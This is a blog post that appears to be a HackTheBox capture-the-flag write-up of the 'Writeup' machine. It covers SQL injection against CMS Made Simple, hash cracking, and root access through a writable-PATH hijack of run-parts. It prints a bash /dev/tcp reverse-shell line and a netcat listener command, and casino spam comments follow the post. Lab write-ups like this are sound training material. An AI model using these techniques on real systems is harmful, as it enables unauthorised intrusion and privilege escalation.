Wednesday, December 30, 2020

Hackthebox Writeup


As always, I started with an nmap scan which revealed two ports open, port 22 (SSH) and port 80 (HTTP).

Visiting port 80 showed a very simple page and nothing else. No links, nothing. Well, except for a warning that I’d be banned if I hit a lot of 404 pages, so no gobuster or similar brute forcing was going to work here.

Fortunately, checking robots.txt gave me something to work on, as it didn’t want me to visit /writeup. Which is exactly what I did!
There wasn’t much of interest in /writeup, but wappalyzer (a Firefox plugin) identified the software running as ‘CMS Made Simple’. Something which exploit-db has several exploits for.
I found an SQL injection exploit which didn’t need any valid credentials, and since I wasn’t able to identify the version of CMS Made Simple running, I decided to give it a try.
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
Within a short time the exploit had extracted a username, and the salt and hash for the password. Using hashcat with mode 20 (md5($salt.$pass)) I got the password ‘raykayjay9’ which allowed me to log in via SSH and grab the user flag.


For root, I did the usual and fetched LinEnum and pspy and ran them. I didn’t initially notice anything with these tools, so I ran pspy with the parameters -fp to see all file system events.
When someone ssh’d into the box, sshd would call run-parts without a specific path, looking in the following dirs in the PATH variable:

Checking if any of these directories were writable showed that both /usr/local/sbin and /usr/local/bin were. So what would happen if I were to put an executable script called ‘run-parts’ into either of the above dirs?
bash -i >& /dev/tcp/ 0>&1
Running chmod +x to make the above script executable and starting a reverse netcat listener

nc -lvnp 9001
All I had to do was log in via SSH again, and I had a reverse root shell and could grab the root flag!



  1. Merkur 15c Safety Razor - Barber Pole - Deccasino
    Merkur worrione 15C Safety 1xbet app Razor - Merkur - 15C for deccasino Barber Pole is the perfect introduction to jancasino the Merkur Safety Razor.

  2. Also, do not miss the 10% weekly rebate if you begin to play regularly at the 카지노사이트 on line casino. The fiat bonus carries normal 35x wagering requirements, but the crypto promo is a bit too steep at 48x. 150 games is a decent assortment, particularly since they all come from one developer - RealTime Gaming.


Contact us


Email *

Message *

Theme Support